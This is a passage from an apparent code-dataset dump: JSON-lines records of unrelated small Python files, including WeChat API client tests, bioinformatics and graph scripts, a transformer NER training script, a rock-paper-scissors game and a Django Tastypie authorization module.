HTTMock(wechat_api_mock):\n result = self.client.jsapi.get_ticket()\n self.assertEqual(\n 'bxLdikRXVbTPdHSM05e5u5sUoXNKd8-41ZO3MhKoyN5OfkWITDGgnr2fwJ0m9E8NYzWKVZvdVtaUgWvsdshFKA', # NOQA\n result['ticket']\n )\n self.assertEqual(7200, result['expires_in'])\n\n def test_jsapi_get_jsapi_signature(self):\n noncestr = 'Wm3WZYTPz0wzccnW'\n ticket = 'sM4AOVdWfPE4DxkXGEs8VMCPGGVi4C3VM0P37wVUCFvkVAy_90u5h9nbSlYy3-Sl-HhTdfl2fzFy1AOcHKP7qg' # NOQA\n timestamp = 1414587457\n url = 'http://mp.weixin.qq.com?params=value'\n signature = self.client.jsapi.get_jsapi_signature(\n noncestr,\n ticket,\n timestamp,\n url\n )\n self.assertEqual(\n '0f9de62fce790f9a083d5c99e95740ceb90c27ed',\n signature\n )\n\n def test_user_convert_to_openid(self):\n with HTTMock(wechat_api_mock):\n res = self.client.user.convert_to_openid('zhangsan')\n self.assertEqual('oDOGms-6yCnGrRovBj2yHij5JL6E', res['openid'])\n self.assertEqual('wxf874e15f78cc84a7', res['appid'])\n\n def test_user_convert_to_user_id(self):\n with HTTMock(wechat_api_mock):\n user_id = self.client.user.convert_to_user_id(\n 'oDOGms-6yCnGrRovBj2yHij5JL6E'\n )\n self.assertEqual('zhangsan', user_id)\n\n def test_upload_media(self):\n media_file = io.StringIO('nothing')\n with HTTMock(wechat_api_mock):\n media = self.client.media.upload('image', media_file)\n self.assertEqual('image', media['type'])\n self.assertEqual('12345678', media['media_id'])\n\n def test_material_get_count(self):\n with HTTMock(wechat_api_mock):\n res = self.client.material.get_count(1)\n self.assertEqual(37, res['total_count'])\n self.assertEqual(3, res['video_count'])\n self.assertEqual(10, res['voice_count'])\n self.assertEqual(12, res['image_count'])\n self.assertEqual(3, res['file_count'])\n self.assertEqual(6, res['mpnews_count'])\n\n def test_material_batchget_mpnews(self):\n with HTTMock(wechat_api_mock):\n res = self.client.material.batchget(1, 'mpnews')\n self.assertEqual('mpnews', res['type'])\n self.assertEqual(20, res['total_count'])\n self.assertEqual(3, res['item_count'])\n self.assertEqual(\n '2-G6nrLmr5EC3MMb_-zK1dDdzmd0p7cNliYu',\n res['itemlist'][0]['media_id']\n )\n\n def test_material_delete(self):\n media_id = '2-G6nrLmr5EC3MMb_-zK1dDdzmd0p7cNliYu'\n with HTTMock(wechat_api_mock):\n res = self.client.material.delete(1, media_id)\n self.assertEqual('deleted', res['errmsg'])\n\n def test_material_get_mpnews(self):\n media_id = '2-G6nrLmr5EC3MMb_-zK1dDdzmd0p7cNliYu'\n with HTTMock(wechat_api_mock):\n res = self.client.material.get_articles(1, media_id)\n self.assertEqual('mpnews', res['type'])\n self.assertEqual(\n '2-G6nrLmr5EC3MMb_-zK1dDdzmd0' +\n 'p7cNliYu9V5w7o8K0HuucGBZCzw4HmLa5C',\n res['mpnews']['articles'][0]['thumb_media_id']\n )\n self.assertEqual(\n '2-G6nrLmr5EC3MMb_-zK1dDdzmd0' +\n 'p7cNliYu9V5w7oovsUPf3wG4t9N3tE',\n res['mpnews']['articles'][1]['thumb_media_id']\n )\n\n def test_reraise_requests_exception(self):\n @urlmatch(netloc=r'(.*\\.)?qyapi\\.weixin\\.qq\\.com$')\n def _wechat_api_mock(url, request):\n return {'status_code': 404, 'content': '404 not found'}\n\n try:\n with HTTMock(_wechat_api_mock):\n self.client.material.get_count(1)\n except WeChatClientException as e:\n self.assertEqual(404, e.response.status_code)\n\n def test_shakearound_get_shake_info(self):\n with HTTMock(wechat_api_mock):\n res = self.client.shakearound.get_shake_info('123456')\n self.assertEqual(14000, res['page_id'])\n self.assertEqual('zhangsan', res['userid'])\n\n def test_service_get_provider_token(self):\n with HTTMock(wechat_api_mock):\n res = self.client.service.get_provider_token('provider_secret')\n\n self.assertEqual(7200, res['expires_in'])\n self.assertEqual('enLSZ5xxxxxxJRL', res['provider_access_token'])\n\n def test_service_get_login_info(self):\n with HTTMock(wechat_api_mock):\n res = self.client.service.get_login_info(\n 'enLSZ5xxxxxxJRL',\n 'auth_code'\n )\n\n self.assertTrue(res['is_sys'])\n self.assertTrue(res['is_inner'])\n\n def test_chat_create(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.create(\n '1', 'chat', 'zhangsan', ['zhangsan', 'lisi', 'wangwu']\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_get(self):\n with HTTMock(wechat_api_mock):\n chat = self.client.chat.get('235364212115767297')\n\n self.assertEqual('235364212115767297', chat['chatid'])\n self.assertEqual('zhangsan', chat['owner'])\n\n def test_chat_update(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.update(\n '235364212115767297',\n 'lisi',\n '企业应用中心',\n 'zhangsan',\n ['zhaoli'],\n ['zhangsan']\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_quit(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.quit('235364212115767297', 'lisi')\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_clear_notify(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.clear_notify('zhangsan', 'single', 'lisi')\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_set_mute(self):\n mute_list = [\n {'userid': 'zhangsan', 'status': 0},\n {'userid': 'lisi', 'status': 1},\n ]\n with HTTMock(wechat_api_mock):\n res = self.client.chat.set_mute(mute_list)\n\n self.assertEqual(0, res['errcode'])\n self.assertEqual(['zhangsan'], res['invaliduser'])\n\n def test_chat_send_text(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.send_text(\n 'zhangsan', 'single', 'lisi', 'hello'\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_send_image(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.send_image(\n 'zhangsan', 'single', 'lisi', 'media_id'\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_chat_send_file(self):\n with HTTMock(wechat_api_mock):\n res = self.client.chat.send_file(\n 'zhangsan', 'single', 'lisi', 'media_id'\n )\n\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_follow_user_list(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_follow_user_list()\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_list(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.list('userid')\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get('external_userid')\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_add_contact_way(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.add_contact_way(\n 1, 1, 1, 'remark', True, 'state', ['UserID1', 'UserID2'],\n ['PartyID1', 'PartyID2']\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_contact_way(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_contact_way(\n '42b34949e138eb6e027c123cba77fad7'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_update_contact_way(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.update_contact_way(\n '42b34949e138eb6e027c123cba77fad7', '渠道客户', True,\n 1, 'teststate', ['UserID1', 'UserID2', 'UserID3'],\n ['PartyID1', 'PartyID2']\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_del_contact_way(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.del_contact_way(\n '42b34949e138eb6e027c123cba77fad7'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_add_msg_template(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.add_msg_template(\n {\n \"external_userid\": [\n \"woAJ2GCAAAXtWyujaWJHDDGi0mACas1w\",\n \"wmqfasd1e1927831291723123109r712\"\n ],\n \"sender\": \"zhangsan\",\n \"text\": {\n \"content\": \"文本消息内容\"\n },\n \"image\": {\n \"media_id\": \"MEDIA_ID\"\n }\n }\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_group_msg_result(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_group_msg_result(\n 'msgGCAAAXtWyujaWJHDDGi0mACas1w'\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_user_behavior_data(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_user_behavior_data(\n [\"zhangsan\", \"lisi\"], 1536508800, 1536940800\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_send_welcome_msg(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.send_welcome_msg(\n {\n \"welcome_code\": \"CALLBACK_CODE\",\n \"text\": {\n \"content\": \"文本消息内容\"\n },\n \"image\": {\n \"media_id\": \"MEDIA_ID\"\n },\n \"link\": {\n \"title\": \"消息标题\",\n \"picurl\": \"https://example.pic.com/path\",\n \"desc\": \"消息描述\",\n \"url\": \"https://example.link.com/path\"\n },\n \"miniprogram\": {\n \"title\": \"消息标题\",\n \"pic_media_id\": \"MEDIA_ID\",\n \"appid\": \"wx8bd80126147df384\",\n \"page\": \"/path/index\"\n }\n }\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_get_unassigned_list(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.get_unassigned_list(\n 0, 100\n )\n self.assertEqual(0, res['errcode'])\n\n def test_external_contact_transfer(self):\n with HTTMock(wechat_api_mock):\n res = self.client.external_contact.transfer(\n \"woAJ2GCAAAXtWyujaWJHDDGi0mACH71w\", \"zhangsan\", \"lisi\"\n )\n self.assertEqual(0, res['errcode'])\n","sub_path":"tests/test_work_client.py","file_name":"test_work_client.py","file_ext":"py","file_size_in_byte":17634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"285803621","text":"import re\nimport pyperclip\n\n\"\"\"preparing dictionary for translation\"\"\"\ncodon_table = open('prot_table.txt', \"r\")\ntab = codon_table.read()\n\ncodons = re.findall('[AUGC]{3}', tab)\n\naas = re.findall('\\s\\w\\s|Stop', tab)\n\n\ndef cleaning(x):\n x = x.replace(\" \", \"\")\n x = x.replace(\"\\n\", \"\")\n return x\ncaas = list(map(cleaning, aas))\n\n\ntrans = {}\nfor i in range(len(codons)):\n trans[str(codons[i])] = caas[i]\n\n\"\"\"translation\"\"\"\nseq = open(\"rosalind_prot.txt\", \"r\")\ns = seq.read()\n\ncods = re.findall(\".{3}\", s)\n\ntranslation = \"\"\nfor cod in cods:\n if trans[cod] == \"Stop\":\n break\n else:\n translation += trans[cod]\nprint(translation)\npyperclip.copy(translation)\n \n","sub_path":"Bioinformatics-Stronghold/prot.py","file_name":"prot.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"35960508","text":"class Solution:\n def peakIndexInMountainArray(self, A: List[int]) -> int:\n\n increasing = True\n for index, value in enumerate(A):\n\n if index > 0:\n\n if value < A[index - 1] and increasing is True:\n return index - 1\n","sub_path":"852_Peak_Index_In_A_Mountain_Array.py","file_name":"852_Peak_Index_In_A_Mountain_Array.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"511592314","text":"\"\"\"\nCalcula los grados de libertad efectivos (EDoF) segun la expresion Ndt/T, donde\nN es la cantidad de datos, dt es el intervalo muestral y T es la integral time\nscale.\n\nT se calcula integrando el area bajo la curva de la funcion de autocorrelacion\nnormalizada hasta el primer zero-crossing y dividiendo por la varianza de la\nserie.\n\nRef.: Emery & Thomson\n@author: Julia Neme\n\"\"\"\n\ndef get_eddof(x):\n import numpy as np\n from scipy import integrate\n x = x[~np.isnan(x)]\n N = np.nanmax(len(x))\n N1 = N-1\n x = x - np.nanmean(x)\n\n # Calcula la funcion de autocorrelacion para lags desde\n # -N1 a N1. Por lo tanto, la correlacion sin lag (la\n # varianza de la serie) estara en c[N1] = c[N-1].\n\n c = np.correlate(x, x, 'full')\n\n # Normaliza la funcion de autocorrelacion segun N-1-k donde\n # k es el numero de lags, positivo.\n\n lags = np.abs(np.arange(-N1+1, N1, 1))\n cn = c[1:-1]/(N-1-lags)\n Var = cn[N1-1]\n\n # Busca el primer zero-crossing\n\n n = 0\n while (cn[N1+n] > 0) and (n < N1):\n n = n+1\n\n # Calcula el tiempo integral y los EDoF\n\n T = integrate.simps(cn[N1-1-n:N1+n])/Var\n\n edof = N/T\n if (np.isnan(edof) == False) and (np.isinf(edof) == False):\n edof = int(edof)\n else:\n edof = np.nan\n return edof\n","sub_path":"eddof.py","file_name":"eddof.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"599919551","text":"import timeit\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n# function removes node and value from graph and returns\n# new graph\ndef delete_from_graph(graph, node, value):\n\tfor k, v in graph.items():\n\t\tif (k == node or k == value):\n\t\t\tfor edge in v:\n\t\t\t\tv.remove(edge)\n\t\t\t\tgraph = delete_from_graph(graph, node, value)\n\t\tif node in v:\n\t\t\tv.remove(node)\n\t\t\tgraph = delete_from_graph(graph, node, value)\n\t\tif value in v:\n\t\t\tv.remove(value)\n\t\t\tgraph = delete_from_graph(graph, node, value)\n\n\treturn graph\n\n# function implements approximate algorithm and returns\n# vertex cover\ndef approx_vertex_cover(graph):\n\tmarked = []\n\n\tfor k, v in graph.items():\n\t\tfor node in v:\n\t\t\tmarked.append((k, node))\n\t\t\tgraph = delete_from_graph(graph, k, node)\n\n\tif (len(marked) == 1):\n\t\treturn 2\n\n\treturn len(marked)\n\ndef main():\n\tgraf1 = nx.connected_watts_strogatz_graph(5, 4, 0.5, seed = 1)\n\tgraf2 = nx.connected_watts_strogatz_graph(50, 20, 0.5, seed = 1)\n\tgraf3 = nx.connected_watts_strogatz_graph(1000, 50, 0.5, seed = 1)\n\tgraph = nx.to_dict_of_lists(graf3)\n\tg = nx.Graph(graph)\n\tstart = timeit.default_timer()\n\tprint(\"Vertex cover: \", approx_vertex_cover(graph))\n\tstop = timeit.default_timer()\n\tprint('Time: ', stop - start)\n\tnx.draw(g, with_labels = True)\n\tplt.show()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"approx_vc.py","file_name":"approx_vc.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"92521353","text":"import torch\nimport torch.nn as nn\n\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nDIM = 64 # Model dimensionality\nBATCH_SIZE = 50 # Batch size\nCRITIC_ITERS = 5 # For WGAN and WGAN-GP, number of critic iters per gen iter\nLAMBDA = 10 # Gradient penalty lambda hyperparameter\nITERS = 200000 # How many generator iterations to train for\nOUTPUT_DIM = 784 # Number of pixels in MNIST (28*28)\n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n\n self.preprocess = nn.Sequential(nn.Linear(128, 4*4*4*DIM), nn.ReLU(True),)\n self.block1 = nn.Sequential(nn.ConvTranspose2d(4*DIM, 2*DIM, 5), nn.ReLU(True) )\n self.block2 = nn.Sequential(nn.ConvTranspose2d(2*DIM, DIM, 5), nn.ReLU(True), )\n self.deconv_out = nn.ConvTranspose2d(DIM, 1, 8, stride=2) \n self.sigmoid = nn.Sigmoid()\n\n def forward(self, input):\n output = self.preprocess(input)\n output = output.view(-1, 4*DIM, 4, 4)\n #print output.size()\n output = self.block1(output)\n #print output.size()\n output = output[:, :, :7, :7]\n #print output.size()\n output = self.block2(output)\n #print output.size()\n output = self.deconv_out(output)\n output = self.sigmoid(output)\n #print output.size()\n return output.view(-1, OUTPUT_DIM)\n\n\nG = Generator().to(device)\nnose = torch.randn((128),device=device)\nout = G(nose)\nprint(out.shape)","sub_path":"src/gan/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"626009541","text":"import random\n\n# Rock✊, Paper✋, and Scissor✌ game\n'''\nRule Book:\n ✊ > ✌\n ✋ > ✊\n ✌ > ✋\n or\n 3 bit 2, 2 bit 1, 1 bit 3\n'''\n\n\ndef choice(u_choice, c_choice):\n print('User choose: ', end='')\n if u_choice==1:\n print(rock)\n elif u_choice==2:\n print(paper)\n elif u_choice==3:\n print(scissor)\n else:\n print('Invalid input')\n\n \n print('Computer choose: ', end='')\n if c_choice==1:\n print(rock)\n elif c_choice==2:\n print(paper)\n else:\n print(scissor)\n\n\ndef conditionToWin(u_c, c_c):\n \n if u_c >=4 or u_c < 1:\n print('You typed an Invalid number, You lose!')\n elif u_c==1 and c_c==3:\n print('You win!')\n elif c_c==1 and u_c==3:\n print('You lose!')\n elif u_c == c_c:\n print(\"It's a draw!\")\n elif c_c > u_c:\n print('You lose!')\n elif u_c > c_c:\n print('You Win!')\n \n\nrock = '✊ 🗿'\npaper = '✋ 📄'\nscissor = '✌ ✂'\n\nuser_choice = int(input(\"What do you want to choose?. 1 For Rock, 2 For Paper or 3 For Scissors: \"))\ncomputer_choice = random.randint(1, 3)\n\nchoice(user_choice, computer_choice)\n\nconditionToWin(user_choice, computer_choice)\n","sub_path":"rockPaperScissorsGame.py","file_name":"rockPaperScissorsGame.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"76357252","text":"import pandas as pd\r\n#from conllu import parse\r\nimport torch\r\nfrom torch import nn\r\nfrom torch import optim\r\nfrom torchtext.vocab import Vectors\r\nfrom sklearn.metrics import accuracy_score, precision_score ,confusion_matrix, f1_score, classification_report,confusion_matrix\r\nimport numpy as np\r\nimport torch.nn.functional as F\r\n\r\nimport time\r\nimport math\r\n\r\ndef asMinutes(s):\r\n m = math.floor(s / 60)\r\n s -= m * 60\r\n return '%dm %ds' % (m, s)\r\n\r\n\r\ndef timeSince(since):\r\n now = time.time()\r\n s = now - since\r\n print(asMinutes(s))\r\n return '%s' % (asMinutes(s))\r\n\r\ntrain_data = pd.read_csv(\"train_data.csv\", index_col=0)\r\n#train_data=train_data.iloc[:300]\r\nval_data = pd.read_csv(\"val_data.csv\", index_col=0)\r\n#val_data=val_data.iloc[:96]\r\ntest_data = pd.read_csv(\"test_data.csv\", index_col=0)\r\n\r\nfor dataFrame in [train_data, val_data, test_data]:\r\n # Remove B-MISC and I-MISC tags\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('B-MISC','O')\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('I-MISC','O')\r\n # Merge GPE_ORG and GPE_LOC into GPE\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('B-GPE_ORG','B-GPE')\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('I-GPE_ORG','I-GPE')\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('B-GPE_LOC','B-GPE')\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('I-GPE_LOC','I-GPE')\r\n \r\n\r\ndef create_data(df, fields):\r\n fields_list = []\r\n for n, entry in df.iterrows():\r\n fields_list.append(Example.fromlist(entry, fields))\r\n data = Dataset(fields_list, fields)\r\n\r\n \r\n return data\r\n\r\nfrom torchtext.data import Field, Dataset, Iterator, Example\r\ntext_field = Field(sequential=True, batch_first=True, include_lengths=True)\r\npos_field = Field(sequential=True, batch_first=True, unk_token=None)\r\n\r\nfields=[('text', text_field), ('', None), ('', None), ('pos', pos_field)]\r\ntrain_data=create_data(train_data, fields)\r\nval_data=create_data(val_data, fields)\r\ntest_data=create_data(test_data, fields)\r\n\r\ntext_field.build_vocab(train_data, max_size=6000, min_freq=2)\r\npos_field.build_vocab(train_data)\r\nprint(\"We have {} words in the vocabulary, including UNK and PAD\".format(len(text_field.vocab)))\r\nprint(\"We have {} POS tags to predict\".format(len(pos_field.vocab)))\r\n\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\ntrain_iter = Iterator(train_data, batch_size=32, shuffle=True, device=device)\r\nval_iter = Iterator(val_data, batch_size=1, shuffle=False, device=device)\r\ntest_iter = Iterator(test_data, batch_size=1, shuffle=False, device=device)\r\n\r\n\r\n\r\nfrom torch.nn import TransformerEncoder, TransformerEncoderLayer\r\n\r\nimport math\r\nclass PositionalEncoding(nn.Module):\r\n\r\n def __init__(self, d_model, dropout=0.1, max_len=5000):\r\n super(PositionalEncoding, self).__init__()\r\n self.dropout = nn.Dropout(p=dropout)\r\n\r\n pe = torch.zeros(max_len, d_model)\r\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\r\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\r\n pe[:, 0::2] = torch.sin(position * div_term)\r\n pe[:, 1::2] = torch.cos(position * div_term)\r\n pe = pe.unsqueeze(0).transpose(0, 1)\r\n self.register_buffer('pe', pe)\r\n\r\n def forward(self, x):\r\n x = x + self.pe[:x.size(0), :]\r\n return self.dropout(x)\r\n\r\n\r\nclass TransformerModel(nn.Module):\r\n def __init__(self, ntoken, emsize, nhead, nhid, nlayers,noutputs, dropout=0.5):\r\n super(TransformerModel, self).__init__()\r\n self.model_type = 'Transformer'\r\n self.pos_encoder = PositionalEncoding(emsize, dropout)\r\n encoder_layers = TransformerEncoderLayer(emsize, nhead, nhid, dropout)\r\n self.transformer_encoder = TransformerEncoder(encoder_layers, nlayers)\r\n self.embedding = nn.Embedding(ntoken, emsize)\r\n self.emsize=emsize\r\n self.src_mask = None\r\n self.decoder = nn.Linear(emsize, noutputs)\r\n self.init_weights()\r\n def init_weights(self):\r\n initrange = 0.1\r\n self.embedding.weight.data.uniform_(-initrange, initrange)\r\n self.decoder.bias.data.zero_()\r\n self.decoder.weight.data.uniform_(-initrange, initrange)\r\n def _generate_square_subsequent_mask(self,lengths):\r\n max_length=torch.max(lengths)\r\n mask_arr=[]\r\n for i in range(len(lengths)):\r\n line_arr=[0 if j2) or epoch==num_epochs:\r\n with torch.no_grad():\r\n model.eval()\r\n pred_values=[]\r\n real_values=[]\r\n for batch in tqdm.tqdm(val_iter):\r\n pred = model(batch)[0].argmax(dim=-1)\r\n gold = batch.pos\r\n\r\n for i in pred:\r\n pred_values.append(i.item())\r\n for j in gold[0]:\r\n real_values.append(j.item())\r\n\r\n f1=f1_score(pred_values,real_values,average=\"macro\")\r\n precision=precision_score(pred_values,real_values,average=\"macro\")\r\n accuracy=accuracy_score(pred_values,real_values)\r\n parameters.append(emsize)\r\n parameters.append(endTime)\r\n parameters.append(epoch)\r\n parameters.append(f1)\r\n parameters.append(precision)\r\n parameters.append(accuracy)\r\n points.append(parameters) \r\n report = classification_report(pred_values, real_values, output_dict=True)\r\n df_rep = pd.DataFrame(report).transpose()\r\n rep_name=exp_name+str(emsize)\r\n model_name=rep_name+\"dict\"+\"epoch\"+str(epoch)+\".pt\"\r\n torch.save(model.state_dict(), model_name )\r\n df_rep.to_csv(\"results/report_\"+rep_name+\".csv\")\r\n df1=pd.DataFrame(points, columns=['emsize',\"time\",\"epoch\", \"f1\", \"precision\",\"accuracy\"])\r\n df1.to_csv(\"results/\"+exp_name +\".csv\")\r\n \r\n\r\n\r\ngrid_search()","sub_path":"final_exam/transformer/transformer_without_char.py","file_name":"transformer_without_char.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"555085918","text":"#!/usr/bin/env python\n# coding: utf-8\n#\nimport sys \nreload(sys) \nsys.setdefaultencoding('utf8')\n#\n\nimport urllib\nfrom BeautifulSoup import BeautifulSoup\nfrom urllib import quote\n\ncommand = '.tq'\ncmd_func = 'getweatherinfo'\ndef getweatherinfo(arg1,arg2):\n \"\"\"获取城市当天天气信息。\"\"\"\n city = arg1\n city = unicode(city, 'utf-8')\n city = city.encode('gbk')\n city = urllib.quote(city)\n try:\n url = 'http://php.weather.sina.com.cn/xml.php?city='+city+'&password=DJOYnieT8234jlsK&day=0'\n weather_xml = urllib.urlopen(url).read()\n soup = BeautifulSoup(weather_xml)\n weather_date = soup.savedate_weather.text\n weather_city = soup.city.text\n weather_status1 = soup.status1.text\n weather_status2 = soup.status2.text\n weather_temp1 = soup.temperature1.text #high temperature\n weather_temp2 = soup.temperature2.text #low temperature\n weather_chy_shuoming = soup.chy_shuoming.text\n weather_pollution = soup.pollution_s.text\n\t\n weather = '['+weather_date+']'+weather_city+','+weather_status1+','+weather_status2+','+'高温'+weather_temp1+','+'低温'+weather_temp2+','+weather_chy_shuoming+','+weather_pollution+'。'\n except:\n weather = '获取天气时出错。'\n \n \n return weather\n","sub_path":"momoko-ircbot/cmds/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"237882257","text":"def main():\n while True:\n try:\n pokemon = int(input(\"How many Pokemon do you have? \"))\n if pokemon >= 0:\n break\n raise ValueError\n except ValueError:\n print(\"Invalid number\")\n\n while True:\n try:\n candy = int(input(\"How many candies do you have for that Pokemon? \"))\n if candy >= 0:\n break\n raise ValueError\n except ValueError:\n print(\"Invalid number\")\n\n while True:\n try:\n cost = int(input(\"How much candy does it take to evolve the pokemon? \")) - 1\n if cost >= 0:\n break\n raise ValueError\n except ValueError:\n print(\"Invalid Number\")\n\n total_evolved = candy // cost\n candy_remaining = candy % cost\n pokemon_remaining = pokemon - total_evolved\n\n transfer_max = pokemon_remaining // cost\n transfer = (pokemon_remaining - transfer_max) // cost\n transfer_mod = (pokemon_remaining - transfer_max) % cost\n total_evolved += transfer\n pokemon_remaining = transfer_mod\n xp = total_evolved * 1000\n\n\n print(\"\\nTransfer {0} pokemon first.\\nYou can evolve {1} pokemon, with {2} candy and {3} pokemon reamining.\\n\"\n \"You will earn {4} EXP. for this pokemon.\" \\\n .format(transfer, total_evolved, candy_remaining, pokemon_remaining, xp))\n return xp\n\nif __name__ == '__main__':\n run_again = \"n\"\n tot_xp = 0\n while run_again != \"\":\n current_xp = main()\n tot_xp += current_xp\n print(\"\\nYou will receive\" ,tot_xp, \"total EXP for all the pokemon you have evolved so far\")\n run_again = input(\"\\nAdd more pokemon? (y/n/ (leave blank to quit) \")\n\n","sub_path":"candy_calculator.py","file_name":"candy_calculator.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"327513436","text":"from tastypie import fields\nfrom tastypie.resources import ModelResource\nfrom catamidb.models import GenericImage\nfrom projects.models import (Project,\n GenericAnnotationSet,\n GenericPointAnnotation,\n GenericWholeImageAnnotation,\n AnnotationCodes,\n QualifierCodes)\nfrom catamidb.api import GenericImageResource\nfrom tastypie.authentication import (Authentication,\n SessionAuthentication,\n MultiAuthentication,\n ApiKeyAuthentication)\nfrom tastypie.authorization import Authorization\nfrom tastypie.exceptions import Unauthorized\nfrom guardian.shortcuts import (get_objects_for_user, get_perms_for_model,\n get_users_with_perms, get_groups_with_perms)\nfrom jsonapi.api import UserResource\nfrom jsonapi.security import get_real_user_object\nfrom projects import authorization\nfrom tastypie.constants import ALL, ALL_WITH_RELATIONS\nfrom datetime import datetime\nfrom random import sample\nfrom tastypie.exceptions import ImmediateHttpResponse\nfrom tastypie.http import HttpNotImplemented\nimport random\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n# ==============================\n# Integration of Backbone and tastypie.\n# Usage: extend this resource to make model compatibile with Backbonejs\n# ==============================\nclass BackboneCompatibleResource(ModelResource):\n class Meta:\n always_return_data = True\n\n def alter_list_data_to_serialize(self, request, data):\n return data[\"objects\"]\n\n\n# Used to allow authent of anonymous users for GET requests\nclass AnonymousGetAuthentication(SessionAuthentication):\n def is_authenticated(self, request, **kwargs):\n # let anonymous users in for GET requests - Authorisation logic will\n # stop them from accessing things not allowed to access\n if request.user.is_anonymous() and request.method == \"GET\":\n return True\n\n return super(AnonymousGetAuthentication, self).is_authenticated(\n request, **kwargs)\n\n\nclass ProjectAuthorization(Authorization):\n \"\"\"\n Implements authorization for projects.\n \"\"\"\n\n def read_list(self, object_list, bundle):\n \"\"\"Restrict the list to only user visible project.\"\"\"\n user = get_real_user_object(bundle.request.user)\n user_objects = get_objects_for_user(user, [\n 'projects.view_project'], object_list)\n\n return user_objects\n\n def read_detail(self, object_list, bundle):\n \"\"\"Check user has permission to view this project.\"\"\"\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to view this object\n if user.has_perm('projects.view_project', bundle.obj):\n return True\n\n raise Unauthorized()\n\n def create_list(self, object_list, bundle):\n raise Unauthorized(\"Sorry, no create lists.\")\n\n def create_detail(self, object_list, bundle):\n #Allow creates for Authenticated users\n\n if bundle.request.user.is_authenticated():\n return True\n\n raise Unauthorized(\n \"You need to log in to create projects.\")\n\n def delete_list(self, object_list, bundle):\n \"\"\"Currently do not permit deletion of any project list.\n \"\"\"\n raise Unauthorized(\n \"You do not have permission to delete these project.\")\n\n def delete_detail(self, object_list, bundle):\n \"\"\"\n Check the user has permission to delete.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to delete this object\n if user.has_perm('projects.delete_project', bundle.obj):\n return True\n\n raise Unauthorized(\n \"You do not have permission to delete this project.\")\n\n def update_detail(self, object_list, bundle):\n \"\"\"Restrict access to updating a project.\n \"\"\"\n # the original can be found in object_list\n #original = object_list.get(id=bundle.obj.id)\n\n user = get_real_user_object(bundle.request.user)\n 